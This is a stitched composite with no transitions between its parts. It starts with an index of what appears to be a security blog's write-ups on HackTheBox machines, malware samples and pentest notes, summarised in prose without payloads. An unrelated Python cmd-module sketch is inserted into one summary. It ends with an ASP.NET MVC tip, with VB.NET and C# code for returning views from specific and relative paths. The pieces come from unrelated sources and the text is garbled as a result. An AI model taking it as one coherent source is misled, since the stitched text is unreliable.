It would have been possible to get through the initial enumeration of Ethereal with just Burp Repeater and tcpdump, or using responder to read the DNS requests. But writing a shell is much more fun and good coding practice. I’ll develop around primary two modules from Python, scapy to listen for and process DNS packets, and cmd to create a shell user interface, with requests to make the http injections. In this post I’ll show how I built the shell step by step.
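As a rough illustration of the cmd half of that pattern (my own minimal sketch, not code from the post): Python’s cmd module turns do_<verb> methods into commands and handles the prompt loop, which is the skeleton a custom C2 shell builds its injection handlers on.

```python
import cmd

class MiniShell(cmd.Cmd):
    """Tiny interactive shell skeleton: each do_<verb> method
    becomes a command available at the prompt."""
    prompt = "shell> "

    def do_echo(self, arg):
        """echo <text> -- print the argument back."""
        print(arg)

    def do_exit(self, arg):
        """exit -- leave the shell loop."""
        return True  # returning a truthy value stops cmdloop()

# cmdloop() would normally read commands from stdin; onecmd() runs a
# single command, which is also handy for testing handlers in isolation.
shell = MiniShell()
shell.onecmd("echo hello")  # prints "hello"
```

In the real shell, a do_ method would make the HTTP injection request and wait for the DNS response instead of just printing.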
HTB: Granny | htb-granny ctf hackthebox webdav aspx webshell htb-devel meterpreter windows ms14-058 local_exploit_suggester pwk cadaver oscp-like
As I’m continuing to work through older boxes, I came to Granny, another easy Windows host involving webshells. In this case, I’ll use WebDAV to get a webshell on target, which is something I haven’t written about before, but that I definitely ran into while doing PWK. In this case, WebDav blocks aspx uploads, but it doesn’t prevent me from uploading as a txt file, and then using the HTTP Move to move the file to an aspx. I’ll show how to get a simple webshell, and how to get meterpreter. For privesc, I’ll use a Windows local exploit to get SYSTEM access.
HTB: Devel | ctf htb-devel hackthebox webshell aspx meterpreter metasploit msfvenom ms11-046 ftp nishang nmap watson smbserver upload windows oscp-like
Another one of the first boxes on HTB, and another simple beginner Windows target. In this case, I’ll use anonymous access to FTP that has its root in the webroot of the machine. I can upload a webshell, and use it to get execution and then a shell on the machine. Then I’ll use one of many available Windows kernel exploits to gain system. I’ll do it all without Metasploit, and then with Metasploit.
HTB: Access | htb-access hackthebox ctf mdbtools readpst mutt telnet runas cached-creds dpapi mimikatz pylnker
Access was an easy Windows box, which is really nice to have around, since it’s hard to find places for beginners on Windows. And, unlike most Windows boxes, it didn’t involve SMB. I’ll start using anonymous FTP access to get a zip file and an Access database. I’ll use command line tools to find a password in the database that works for the zip file, and find an Outlook mail file inside. I’ll read the email to find the password for an account on the box, and connect with telnet. From there, I’ll take advantage of cached administrator credentials two different ways to get root.txt. In Beyond Root, I’ll look at ways to get more details out of lnk files, both with PowerShell and pylnker.
Playing with Jenkins RCE Vulnerability | exploit cve-2019-1003000 jenkins jeeves powershell nishang windows
HTB: Zipper | ctf htb-zipper hackthebox nmap zabbix api credentials path-hijack docker ltrace service-hijack exploit-db jq openssl php pivot ssh linux ubuntu oswe-like
Zipper was a pretty straight-forward box, especially compared to some of the more recent 40 point boxes. The main challenge involved using the API for a product called Zabbix, used to manage and inventory computers in an environment. I’ll show way too many ways to abuse Zabbix to get a shell. Then for privesc, I’ll show two methods, using a suid binary that makes a call to system without providing a full path, allowing me to change the path and get a root shell, and identifying a writable service file that I can hijack to gain root privilege. In Beyond Root, I’ll dig into the shell from Exploit-DB, figure out how it works, and make a few improvements.
Wizard Labs: Dummy | ctf wizard-labs wl-dummy windows ms17-010 smb msfvenom htb-legacy
I had an opportunity to check out Wizard Labs recently. It’s a recently launched service much like HackTheBox. Their user interface isn’t as polished or feature rich as HTB, but they have 16 vulnerable machines online right now to attack. The box called Dummy recently retired from their system, so I can safely give it a walk-through. It’s a bit of bad luck that I looked at this just after doing Legacy, as they were very similar boxes. Seems popular to start a service with a Windows SMB vulnerability. This was a Windows 7 box, vulnerable to MS17-010. I’ll use a different python script, and give the Metasploit exploit a spin and fail.
HTB: Legacy | ctf hackthebox htb-legacy windows ms08-067 ms17-010 smb msfvenom xp oscp-like
Since I’m caught up on all the live boxes, challenges, and labs, I’ve started looking back at retired boxes from before I joined HTB. The top of the list was Legacy, a box that seems like it was one of the first released on HTB. It’s a very easy Windows box, vulnerable to two SMB bugs that are easily exploited with Metasploit. I’ll show how to exploit both of them without Metasploit, generating shellcode and payloads with msfvenom, and modifying public scripts to get shells. In Beyond Root, I’ll take a quick look at the lack of whoami on XP systems.
HTB: Giddy | hackthebox ctf htb-giddy sqli sqlmap winrm net-ntlmv2 responder hashcat unifivideo defender ebowla smbserver applocker powershell-web-access
I thought Giddy was a ton of fun. It was a relatively straight forward box, but I learned two really neat things working it (each of which inspired other posts). The box starts with some enumeration that leads to a site that gives inventory. I’ll abuse an SQL-Injection vulnerability to get the host to make an SMB connect back to me, where I can collect a Net-NTLMv2 challenge response, and crack it to get a password. I can then use either the web PowerShell console or WinRM to get a shell. To get system, I’ll take advantage of a vulnerability in Ubiquiti UniFi Video.
Playing with Dirty Sock | snapd cve-2019-7304 hackthebox ubuntu exploit dirty-sock htb-canape
A local privilege escalation exploit against a vulnerability in the snapd server on Ubuntu was released today by Shenanigans Labs under the name Dirty Sock. Snap is an attempt by Ubuntu to simplify packaging and software distribution, and there’s a vulnerability in the REST API which is attached to a local UNIX socket that allowed multiple methods to get root access. I decided to give it a run, both on a VM locally and on some of the HackTheBox.eu machines.
HTB: Ypuffy | htb-ypuffy hackthebox ctf ldap ssh ssh-keygen doas sudo certificate certificate-authority wireshark cve-2018-14665 python flask wsgi authorizedkeyscommand htb-dab
Ypuffy was an OpenBSD box, but the author said it could have really been any OS, and I get that. The entire thing was about protocols that operate in any environment. I’ll use ldap to get a hash, which I can use to authenticate to an SMB share. There I find an SSH key that gets me a user shell. From there, I’ll abuse my doas privilege with ssh-keygen to create a signed certificate that I can use to authenticate to the box as root for ssh. In Beyond Root, I’ll look at the Xorg privesc vulnerability that became public a month or so after Ypuffy was released, and also explore the web server configuration used in the ssh auth.
HTB: Dab | ctf htb-dab hackthebox flask python nginx wsgi memcached bruteforce hydra wfuzz hashcat ssh ldd ldconfig reverse-engineering ida
Dab had some really neat elements, with a few trolls thrown in. I’ll start by ignoring a steg troll in an open FTP and looking at two web apps. As I’m able to brute force my way into one, it populates a memcached instance, that I’m then able to query using the other as a proxy. From that instance, I’m able to dump users with md5 password hashes. After cracking twelve of them, one gives me ssh access to the box. From there, I’ll take advantage of my having root level access to the tool that configures how dynamic run-time linking occurs, and use that to pivot to a root shell. In Beyond Root, I’ll look at the web apps and how they are configured, one of the troll binaries, and a cleanup cron job I found but managed to avoid by accident.
PWK Notes: Tunneling and Pivoting [Updated] | pwk oscp pivot ssh tunnel sshuttle meterpreter htb-reddish
HTB: Reddish | htb-reddish hackthebox ctf node-red nodejs tunnel php redis rsync wildcard docker
Reddish is one of my favorite boxes on HTB. The exploitation wasn’t that difficult, but it required tunneling communications through multiple networks, and operating in bare-bones environments without the tools I’ve come to expect. Reddish was initially released as a medium difficulty (30 point) box, and after the initial user blood took 9.5 hours, and root blood took 16.5 hours, it was raised to hard (40). Later, it was upped again to insane (50). To get root on this box, I’ll start with an instance of node-red, a javascript browser-based editor to set up flows for IoT. I’ll use that to get a remote shell into a container. From there I’ll pivot using three other containers, escalating privilege in one, before eventually ending up in the host system. Throughout this process, I’ll only have connectivity to the initial container, so I’ll have to maintain tunnels for communication.
HTB: SecNotes | hackthebox ctf htb-secnotes csrf second-order-sqli second-order smb wsl bash.exe winexe smbclient webshell oscp-like htb-nightmare
SecNotes is a bit different to write about, since I built it. The goal was to make an easy Windows box, though the HTB team decided to release it as a medium Windows box. It was the first box I ever submitted to HackTheBox, and overall, it was a great experience. I’ll talk about what I wanted the box to look like from the HTB user’s point of view in Beyond Root. SecNotes had a neat XSRF in the site that was completely bypassed by most people using an unintentional second order SQL injection. Either way, after gaining SMB credentials, it allowed the attacker to upload a webshell, and get a shell on the host. Privesc involved diving into the Windows Subsystem for Linux, finding the history file, and getting the admin creds from there.
Holiday Hack 2018: KringleConctf sans-holiday-hack
The Sans Holiday Hack is one of the events I most look forward to each year. This year’s event is based around KringleCon, an infosec conference organized by Santa as a response to the fact that there have been so many attempts to hack Christmas over the last few years. This conference even has a bunch of talks, some quite useful for completing the challenge, but others that as just interesting as on their own. To complete the Holiday Hack Challenge, I’m asked to enter this virtual conference, walk around, and solve a series of technical challenges. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving. The designers also implemented several more defensive / forensic challenges this year, which was neat to see.
Getting Creds via NTLMv2responder mitm net-ntlmv2 hashcat llmnr wpad xp-dirtree.
HTB: Ozhtb-oz hackthebox ctf api sqli hashcat ssti jinja2 payloadsallthethings docker container pivot ssh port-knocking portainer tplmap jwt htb-olympus
Oz was long. There was a bunch of enumeration at the front, but once you get going, it presented a relatively straight forward yet technically interesting path through two websites, a Server-Side Template Injection, using a database to access an SSH key, and then using the key to get access to the main host. To privesc, I’ll go back into a different container and take advatnage of a vulnarbility in the docker management software to get root access.
HTB: Mischief Additional Rootshtb-mischief hackthebox ctf cve-2018-18955 policykit polkit pkexec pkttyagent
Since publishing my write-up on Mischief from HackTheBox, I’ve learned of two additional ways to privesc to root once I have access as loki. The first is another method to get around the fact the
suwas blocked on the host using PolicyKit with the root password. The second was to take advantage of a kernel bug that was publicly released in November, well after Mischief went live. I’ll quickly show both those methods.
HTB: Mischiefhackthebox ctf htb-mischief ipv6 snmp snmpwalk enyx command-injection hydra filter facl getfacl systemd-run lxc lxd wfuzz xxd iptables color-print htb-olympus
Mishcief was one of the easier 50 point boxes, but it still provided a lot of opportunity to enumerate things, and forced the attacker to think about and work with IPv6, which is something that likely don’t come naturally to most of us. I’ll use snmp to get both the IPv6 address of the host and credentials from the webserver. From there, I can use those creds to log in and get more creds. The other creds work on a website hosted only on IPv6. That site has command injection, which gives me code execution, a shell as www-data, and creds for loki. loki’s bash history gives me the root password, which I can use to get root, once I get around the fact that file access control lists are used to prevent loki from running su. In beyond root, I’ll look at how I could get RCE without the creds to the website, how I might have exfiled data via ping if there wasn’t a way to see output, the filtering that site did, and the iptables rules.
Hackvent 2018: Days 1-12ctf hackvent jab qrcode 14-segment-display javascript dial-a-pirate certificate-transparency piet perl deobfuscation steganography stegsolve nodejs sandbox-escape crypto telegram sqli
Hackvent is a great CTF, where a different challenge is presented each day, and the techniques necessary to solve each challenge vary widely. Like Advent of Code, I only made it through the first half before a combination of increased difficulty, travel for the holidays, and Holiday Hack (and, of course, winning NetWars TOC) all led to my stopping Hackvent mid-way. Still, even the first 12 challenges has some neat stuff, and were interesting enough to write up.
You Need To Know jqctf sans-holiday-hack hackthebox jq htb-waldo ja3 malware
jq is such a nifty tool that not nealry enough people know about. If you’re working with json data, even just small bits here and there, it’s worth knowing the basics to make some simple data manipulations possible. And if you want to become a full on jq wizard, all the better. In this post, I’ll walk through three examples of varying levels of complexity to show off jq. I’ll detail what I did in Waldo, show an example from the 2017 Sans Holiday Hack Challenge, and conclude with a real-world example where I’m looking at SSL/TLS fingerprints.
HTB: Waldoctf hackthebox htb-waldo docker php ssh rbash capabilities
Waldo was a pretty straight forward box, with a few twists that weren’t too difficult to circumvent. First, I’ll take advantage of a php website, that allows me to leak its source. I’ll use that to bypass filters to read files outside the webroot. In doing so, I’ll find an ssh key that gets me into a container. I’ll notice that I can actually ssh back into localhost again to get out of the container, but with a restricted rbash shell. After escaping, I’ll find the tac program will the linux capability set to allow for full system read, giving me full read access over the entire system, including the flag.
Advent of Code 2018: Days 1-12ctf advent-of-code python
Advent of Code is a fun CTF because it forces you to program, and to think about data structures and efficiency. It starts off easy enough, and gets really hard by the end. It’s also a neat learning opportunity, as it’s one of the least competitive CTFs I know of. After the first 20 people solve and the leaderboard is full, people start to post answers on reddit on other places, and you can see how others solved it, or help yourself when you get stuck. I’m going to create one post and just keep updating it with my answers as far as I get.
HTB: Activectf hackthebox htb-active active-directory gpp-password gpp-decrypt smb smbmap smbclient enum4linux getuserspns kerberoast hashcat psexec-py oscp-like
Active was an example of an easy box that still provided a lot of opportunity to learn. The box was centered around common vulnerabilities associated with Active Directory. There’s a good chance to practice SMB enumeration. It also gives the opportunity to use Kerberoasting against a Windows Domain, which, if you’re not a pentester, you may not have had the chance to do before.
PWK Notes: SMB Enumeration Checklist [Updated]oscp pwk enumeration smb nmblookup smbclient rpcclient nmap enum4linux smbmap
[Update 2018-12-02] I just learned about smbmap, which is just great. Adding it to the original post. Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. [Original] As I’ve been working through PWK/OSCP for the last month, one thing I’ve noticed is that enumeration of SMB is tricky, and different tools fail / succeed on different hosts. With some input from the NetSecFocus group, I’m building out an SMB enumeration check list here. I’ll include examples, but where I use PWK labs, I’ll anonymize the data per their rules. If I’m missing something, leave a comment.
HTB: Hawkhackthebox ctf htb-hawk drupal ftp openssl openssl-bruteforce php credentials h2 oscp-plus
Hawk was a pretty easy box, that provided the challenge to decrypt a file with openssl, then use those credentials to get admin access to a Drupal website. I’ll use that access to gain execution on the host via php. Credential reuse by the daniel user allows me to escalate to that user. From there, I’ll take advantage of a H2 database to first get arbitrary file read as root, and then target a different vulnerability to get RCE and a root shell. In Beyond Root, I’ll explore the two other listening ports associated with H2, 5435 and 9092.
HTB: Smasherctf hackthebox htb-smasher bof pwntools timing-attack padding-oracle aes directory-traversal
Smasher is a really hard box with three challenges that require a detailed understanding of how the code you’re intereacting with works. It starts with an instance of shenfeng tiny-web-server running on port 1111. I’ll use a path traversal vulnerability to access to the root file system. I’ll use that to get a copy of the source and binary for the running web server. With that, I’ll write a buffer overflow exploit to get a reverse shell. Next, I’ll exploit a padding oracle vulnerability to get a copy of the smasher user’s password. From there, I’ll take advantage of a timing vulnerability in setuid binary to read the contents of root.txt. I think it’s possible to get a root shell exploiting a buffer overflow, but I wasn’t able to pull it off (yet). In Beyond Root, I’ll check out the AES script, and show how I patched the checker binary.
Buffer Overflow in HTB Smasherctf hackthebox htb-smasher gdb bof pwntools
There was so much to write about for Smasher, it seemed that the buffer overflow in tiny deserved its own post. I’ll walk through my process, code analysis and debugging, through development of a small ROP chain, and show how I trouble shot when things didn’t work. I’ll also show off pwntools along the way.
HTB: Jerryhackthebox htb-jerry ctf nmap tomcat war msfvenom jar jsp oscp-like
Jerry is quite possibly the easiest box I’ve done on HackTheBox (maybe rivaled only by Blue). In fact, it was rooted in just over 6 minutes! There’s a Tomcat install with a default password for the Web Application Manager. I’ll use that to upload a malicious war file, which returns a system shell, and access to both flags.
Malware Analysis: Phishing Docs from HTB Reelhackthebox ctf htb-reel malware rtf hta msfvenom rtfdump oledump scdbg powershell vbscript shellcode
I regularly use tools like msfvenom or scripts from GitHub to create attacks in HackTheBox or PWK. I wanted to take a minute and look under the hood of the phishing documents I generated to gain access to Reel in HTB, to understand what they are doing. By the end, we’ll understand how the RTF abuses a COM object to download and launch a remote HTA. In the HTA, we’ll see layers of script calling each other, until I find some shellcode loaded into memory by PowerShell and run. I’ll do some initial analysis of that shellcode to see the network connection attempts.
HTB: Reelhackthebox htb-reel ctf ftp cve-2017-0199 rtf hta phishing ssh bloodhound powerview active-directory metasploit htb-bart
Reel was an awesome box because it presents challenges rarely seen in CTF environments, phishing and Active Directory. Rather than initial access coming through a web exploit, to gain an initial foothold on Reel, I’ll use some documents collected from FTP to craft a malicious rtf file and phishing email that will exploit the host and avoid the protections put into place. Then I’ll pivot through different AD users and groups, taking advantage of their different rights to eventually escalate to administrator. In Beyond Root, I’ll explore remnants of a second path to root that didn’t make the final cut, look at the ACLs on root.txt, examine the script that opens attachments as nico.
PowerShell History Filepowershell psreadline history
I came across a situation where I discovered a user’s PSReadline ConsoleHost_history.txt file, and it ended up giving me the information I needed at the time. Most people are aware of the
.bash_historyfile. But did you know that the PowerShell equivalent is enabled by default starting in PowerShell v5 on Windows 10? This means this file will become more present over time as systems upgrade.
HTB: Dropzonehackthebox htb-dropzone ctf xp tftp mof wmi stuxnet alternative-data-streams sysinternals
Dropzone was unique in many ways. Right off the bat, an initial nmap scan shows no TCP ports open. I’ll find unauthenticated TFTP on UDP 69, and use that access identify the host OS as Windows XP. From there, I’ll use TFTP to drop a malicious mof file where it will automatically compiled, giving me code execution, in a technique made well know by Stuxnet (though not via TFTP, but rather a SMB 0-day). This technique provides a system shell, but there’s one more twist, as I’ll have to find the flags in alternative data streams of a text file on the desktop. I’ll also take this opportunity to dive in on WMI / MOF and how they were used in Stuxnet.
HTB: Bountyhackthebox htb-bounty ctf asp upload nishang lonelypotato potato meterpreter ms10-051 ms16-014 web-config sherlock watson oscp-like
Bounty was one of the easier boxes I’ve done on HTB, but it still showcased a neat trick for initial access that involved embedding ASP code in a web.config file that wasn’t subject to file extension filtering. Initial shell provides access as an unprivileged user on a relatively unpatched host, vulnerable to several kernel exploits, as well as a token privilege attack. I’ll show a handful of ways to enumerate and to escalate privilege, including a really neat new tool, Watson. When I first wrote this post, Watson wouldn’t run on Bounty, but thanks to some quick work from Rasta Mouse and Mark S, I was able to update the post to include it.
HTB TartarSauce: backuperer Follow-Upctf hackthebox htb-tartarsauce tar diff
I always watch IppSec’s videos on the retired box, because even if I completed the box, I typically learn something. Watching IppSec’s TartarSauce video yesterday left me with three things I wanted to play with a bit more in depth, each related to the
backupererscript. First, the issue of a bash if statement, and how it evaluates on exit status. Next, how Linux handles permissions and ownership between hosts and in and out of archives. Finally, I was wrong in thinking there wasn’t a way to get a root shell… so of course I have to do that.
HTB: TartarSaucectf htb-tartarsauce hackthebox wordpress wpscan php webshell rfi sudo tar pspy monstra cron oscp-like
TartarSauce was a box with lots of steps, and an interesting focus around two themes: trolling us, and the tar binary. For initial access, I’ll find a barely functional WordPress site with a plugin vulnerable to remote file include. After abusing that RFI to get a shell, I’ll privesc twice, both times centered around tar; once through sudo tar, and once needing to manipulate an archive before a sleep runs out. In beyond root, I’ll look at some of the rabbit holes I went down, and show a short script I created to quickly get initial access and do the first privesc in one step.
HTB: DevOopsctf hackthebox htb-devoops xxe ssh git pickle deserialization htb-canape rss oscp-plus
DevOops was a really fun box that did a great job of providing interesting challenges that weren’t too difficult to solve. I’ll show how to gain access using XXE to leak the users SSH key, and then how I get root by discovering the root SSH key in an old git commit. In Beyond Root, I’ll show an alternative path to user shell exploiting a python pickle deserialization bug.
PWK Notes: Post-Exploitation Windows File Transfers with SMBpwk oscp smb impacket exfil upload.
HTB: Sundayctf hackthebox htb-sunday finger hashcat sudo wget shadow sudoers gtfobins arbitrary-write oscp-like
Sunday is definitely one of the easier boxes on HackTheBox. It had a lot of fun concepts, but on a crowded server, they step on each other. We start by using finger to brute-force enumerate users, though once once person logs in, the answer is given to anyone working that host. I’m never a huge fan of asking people to just guess obvious passwords, but after that, there are a couple more challenges, including a troll that proves useful later, some password cracking, and a ton of neat opportunities to complete the final privesc using wget. I’ll show 6 ways to use wget to get root. Finally, in Beyond Root, I’ll explore the overwrite script being run by root, finger for file transfer, and execution without read.
HTB: Olympushackthebox htb-olympus ctf zone-transfer xdebug aircrack-ng 802-11 ssh port-knocking docker cve-2018-15473
Olympus was, for the most part, a really fun box, where we got to bounce around between different containers, and a clear path of challenges was presented to us. The creator did a great job of getting interesting challenges such as dns and wifi cracking into a HTB format. There was one jump I wasn’t too excited to have to make, but overall, this box was a lot of fun to attack.
HTB: Canapehackthebox python pickle deserialization couchdb ctf htb-canape flask pip sudo cve-2017-12635 cve-1017-12636 cve-2018-8007 erl erlang
Canape is one of my favorite boxes on HTB. There is a flask website with a pickle deserialization bug. I find that bug by taking advantage of an exposed git repo on the site. With a user shell, we can exploit CouchDB to gain admin access, where we get homer’s password. I went down several rabbit holes trying to get code execution through couchdb, succeeding with EMPD, succeeding with one config change as root for CVE-2018-8007, and failing with CVE-2017-12636. Finally, I’ll take advantage of our user having sudo rights to run pip, and first get a copy of the flag, and then take it all the way to root shell.
Malware Analysis: BMW_Of_Sterlin.docmalware vba doc powershell dosfuscation olevba
Someone on an InfoSec group I participate in asked for help looking at a potentially malicious word doc. I took a quick look, and when I sent back the command line that came out, he asked if I could share how I was able to de-obfuscate quickly. In writing it up for him, I figured it might help others as well, so I’ll post it here as an example.
Malware Analysis: YourExploit.pdfmalware pdf pdf-parser pdfid nanocore vbscript
Pretty simple PDF file was uploaded to VT today, and only 11 of our 59 vendors mark is as malicious, despite it’s being pretty tiny and clearly bad. The file makes no effort at showing any real cover, and could even be a test upload from the malicious actor. The file writes a vbs script which downloads the next stage, and then runs the script and then the resulting binary. The stage two is still up, so I got a copy, which I was able to identify as nanocore, and do some basic dynamic analysis of that as well.
HTB: Poisonhackthebox ctf htb-poison log-poisoning lfi webshell vnc oscp-like
Poison was one of the first boxes I attempted on HTB. The discovery of a relatively obvious local file include vulnerability drives us towards a web shell via log poisoning. From there, we can find a users password out in the clear, albeit lightly obfuscated, and use that to get ssh access. With our ssh access, we find VNC listening as root on localhost, and
HTB: Stratospherectf htb-stratosphere hackthebox python struts cve-2017-9805 cve-2017-5638 mkfifo-shell forward-shell
Stratosphere is a super fun box, with an Apache Struts vulnerability that we can exploit to get single command execution, but not a legit full shell. I’ll use the Ippsec mkfifo pipe method to write my own shell. Then there’s a python script that looks like it will give us the root flag if we only crack some hashes. However, we actually have to exploit the script, to get a root shell.
SecNotes now live on HackTheBoxctf htb-secnotes hackthebox windows
My first submission to HTB, SecNotes, went live today! I was aiming for an easy (20 pt) Windows box, but it released as a medium (30 pt) box. First blood for user just fell, 1 hour and 9 minutes in. Still waiting on root. I hope people enjoy, and if you do the box, please reach out to me on the forums or direct message and let me know what you thought of it, and how you solved it. I’d be very excited to hear if there were any unintended paths discovered.
HTB: Celestialhackthebox htb-celestial ctf nodejs deserialization htb-aragog pspy cron oswe-like
Celestial is a fairly easy box that gives us a chance to play with deserialization vulnerabilities in Node.js. Weather it’s in struts, or python’s pickle, or in Node.js, deserialization of user input is almost always a bad idea, and here’s we’ll show why. To escalate, we’ll take advantage of a cron running the user’s code as root.
Malware Analysis: dotanFile.docmalware
On first finding this sample, I was excited to think that I had found something interesting, rarely detected, and definitely malicious so close to when it was potentially used in a phishing attack. The more analysis I did, the more it became clear this was more likely a testing document, used by a security team evaluating their employees or an endpoint product. Still, it was an interesting sample to play with, and understand how it does interesting things like C2 protocol detection and Sandbox detection.
Malware Analysis: Penn National Health and Wellness Program 2018.docmalware doc vba msbuild csproj dns document-variables crypto c# oledump
This word document contains a short bit of VBA that’s obfuscated using Word document variables to store the strings that might be identified in email filters and by AV. This seems to be effective, given the VT dection ratio. In fact, I came across this sample in conversation with someone who worked for one of the few products that was catching this sample. The VBA drops a Visual Basic C# project file, and runs it with msbuild, which executes a compilation Task. This code uses DNS TXT records to decrypt a next stage payload. Unfortunately, since the DNS record is no longer present.
Malware Analysis: inovoice-019338.pdfmalware pdf pdfid pdf-parser powershell settingcontent-ms flawedammyy
This is a neat PDF sample that I saw mentioned on @c0d3inj3cT’s Twitter, and wanted to take a look for myself. As @c0d3inj3cT says, it is a PDF that drops a SettingsContent-ms file, which then uses PowerShell to download and execute the next stage. I had been on the lookout for PDFs that try to run code to play with, so this seemed like a good place to dive in.
HTB: Silohtb-silo hackthebox ctf oracle odat sqlplus nishang aspx webshell volatility passthehash rottenpotato potato oscp-like
Silo was the first time I’ve had the opportunity to play around with exploiting a Oracle database. After the struggle of getting the tools installed and learning the ins and outs of using them, we can take advantage of this database to upload a webshell to the box. Then with the webshell, we can get a powershell shell access as a low-priv user. To privesc, we’ll have to break out our memory forensics skillset to get a hash out of a memory dump, which then we can pass back in a pass the hash attack to get a system shell. That’s all if we decided not to take the shortcut and just use the Oracle database (running as system) to read both flag files.
Malware Analysis: mud.docdoc vba malware crypto phishing wmi
This phishing document was interesting for not only its lure / cover, but also for the way it used encryption to target users who had a domain with certain key words in it. While brute forcing the domains only results in some potentially financial key words, the stage 2 domain acts as a pivot to find an original phish email in VT, which shows this was quite targeted after all.
HTB: Valentinehackthebox htb-valentine ctf heartbleed tmux dirtycow oscp-like
Valentine was one of the first hosts I solved on hack the box. We’ll use heartbleed to get the password for an SSH key that we find through enumeration. There’s two paths to privesc, but I’m quite partial to using the root tmux session. The box is very much on the easier side for HTB.
SANS SEC599 Reviewtraining review purple-team
I had the chance to take SANS SEC599, “Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses” last week at SANSFIRE. The class is one of the newer SANS offerings, and so I suspect it will be changing and updating rapidly. There are some things I would change about the class, but overall, I enjoyed the class, definitely learned things that I didn’t know before, and got to meet some really smart people.
HTB: Aragogctf htb-aragog hackthebox xxe ssh pspy wordpress cron
Aragog provided a chance to play with XML External Entity (XXE) vulnerabilities, as well as a chance to modify a running website to capture user credentials.
HTB: Barthackthebox htb-bart ctf nmap gobuster wfuzz cewl bruteforce log-poisoning php webshell nishang winlogon powershell-run-as oscp-plus
Bart starts simple enough, only listening on port 80. Yet it ends up providing a path to user shell that requires enumeration of two different sites, bypassing two logins, and then finding a file upload / LFI webshell. The privesc is relateively simple, yet I ran into an interesting issue that caused me to miss it at first. Overall, a fun box with lots to play with.
Second Order SQL-Injection on HTB Nightmarehackthebox htb-nightmare ctf sqli sqlmap tamper second-order-sqli second-order
Nightmare just retired, and it was a insanely difficult box. Rather than do a full walkthrough, I wanted to focus on a write-up of the second-order SQL injection necessary as a first step for this host.
Malware Analysis: Faktura_VAT_115590300178.jsmalware javascript procmon procdot process-hacker logging powershell
I spent some time looking at this javascript sample from VT. Based on both the file extension and the fact that I couldn’t get it to run in
spidermonkeyor
internet explorer, it seems likely that this was a
.jsfile.
HTB: Nibbleshackthebox htb-nibbles ctf meterpreter sudo cve-2015-6967 oscp-like
Nibbles is one of the easier boxes on HTB. It hosts a vulnerable instance of nibbleblog. There’s a Metasploit exploit for it, but it’s also easy to do without MSF, so I’ll show both. The privesc involves abusing
sudoon a file that is world-writable.
HTB: Falafelhackthebox htb-falafel ctf wfuzz sqlmap sqli type-juggling php upload webshell framebuffer /dev/fb0 debugfs oscp-plus oswe-like
Falafel is one of the best put together boxes on HTB. The author does a great job of creating a path with lots of technical challenges that are both not that hard and require a good deal of learning and understanding what’s going on. And there are hints distributed to us along the way.
HTB: Chatterboxhackthebox htb-chatterbox ctf msfvenom meterpreter achat autorunscript nishang oscp-like
Chatterbox is one of the easier rated boxes on HTB. Overall, this box was both easy and frustrating, as there was really only one exploit to get all the way to system, but yet there were many annoyances along the way. While I typically try to avoid Meterpreter, I’ll use it here because it’s an interesting chance to learn / play with the Metasploit AutoRunScript to migrate immediately after exploitation, so that I could maintain a stable shell.
Intro to SSH Tunnelinghackthebox ssh tunnel
I came across a situation on a htb box today where I needed IE to get a really slow, older, OWA page to fully function and do what I needed to do. I had a Windows vm around, but it was relatively isolated, and no able to talk directly to my kali vm. SSH tunneling turned out to be the easiest solution here, and since I get questions about SSH tunneling all the time, I figured it would be good to write up a short description.
PSDecode, follow-on analysis of Emotet samplesemotet malware doc powershell invoke-obfuscation psdecode
In my analysis of an emotet sample, I came across PSDecode, and, after some back and forth with the author and a couple updates, got it working on this sample. The tool is very cool. What follows is analysis of a different emotet phishing document similar to the other one I was looking at, as well as
PSDecodeoutput for the previous sample.
Malware: Facture-impayee-30-mai#0730-04071885.docmalware doc vba powershell emotet invoke-obfuscation
Interesting sample from VT which ends up being a phishing document for the Emotet malware.
HTB: CrimeStoppersctf hackthebox htb-crimestoppers php php-wrapper lfi ida reverse-engineering
This is one of my favorite boxes on HTB. It’s got a good flow, and I learned a bunch doing it. We got to tackle an LFI that allows us to get source for the site, and then we turn that LFI into RCE toget access. From there we get access to a Mozilla profile, which allows privesc to a user, and from there we find someone’s already left a modified rootme apache module in place. We can RE that mod to get root on the system.
HTB: FluxCapacitorctf hackthebox htb-fluxcapacitor waf wfuzz sudo
Probably my least favorite box on HTB, largely because it involved a lot of guessing. I did enjoy looking for privesc without having a shell on the host.
HTB: Bashedctf hackthebox htb-bashed php sudo cron oscp-like
Bashed retired from hackthebox.eu today. Here’s my notes transformed into a walkthrough. These notes are from a couple months ago, and they are a bit raw, but posting here anyway.
Home Lab On The Super Cheap - ESXimacpro home-lab esxi
Getting the hypervisor installed is the next step.
Home Lab On The Super Cheap - The Hardwareebay macpro home-lab
The benefits of a home lab are numerous to anyone into infosec, CTFs, and/or malware analysis. Here’s how I approached it on the cheap. | https://0xdf.gitlab.io/ | CC-MAIN-2022-40 | refinedweb | 52,313 | 56.89 |
In this tip, I demonstrate how you can retrieve a view from any folder in an ASP.NET MVC application. I show you how to use both specific paths and relative paths.
In this tip, I demonstrate how you can retrieve a view from any folder in an ASP.NET MVC application. I show you how to use both specific paths and relative paths.
Until today, I thought that a controller action could return a view from only one of two places:
· Views\controller name · Views\Shared
· Views\controller name
· Views\Shared
For example, if you are working with the ProductController, then I believed that you could only return a view from either the Views\Product folder or the Views\Shared folder. When looking through the source code for the ViewLocator class, I discovered that I was wrong. If you supply a “Specific Path” for a view, you can retrieve a view from any location in an ASP.NET MVC application.
The ProductController.Index() action in Listing 1 returns a view from the specific path ~\Confusing\ButWorks.aspx.
Listing 1 – ProductController.vb (VB.NET)
Public Class ProductController
Inherits Controller
Public Function Index() As ActionResult
Return View("~\Confusing\ButWorks.aspx")
End Function
End Class
Listing 1 – ProductController.cs (C#)
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
namespace Tip24.Controllers
{
public class ProductController : Controller
{
public ActionResult Index()
{
return View( @"~\Confusing\ButWorks.aspx");
}
}
}
A specific path is a path that starts with either the character ~ or /. Any other path gets treated differently.
You also can use relative paths such as SubProduct\Details or SubProduct/Details. Either relative path will return a view located at Views\Product\SubProduct\Details.aspx. Listing 2 contains a complete code listing that illustrates using relative paths.
Listing 2 – ProductController.vb (VB.NET)
Return View("SubProduct\Details")
Listing 2 – ProductController.cs (C#)
return View(@"SubProduct\Details");.
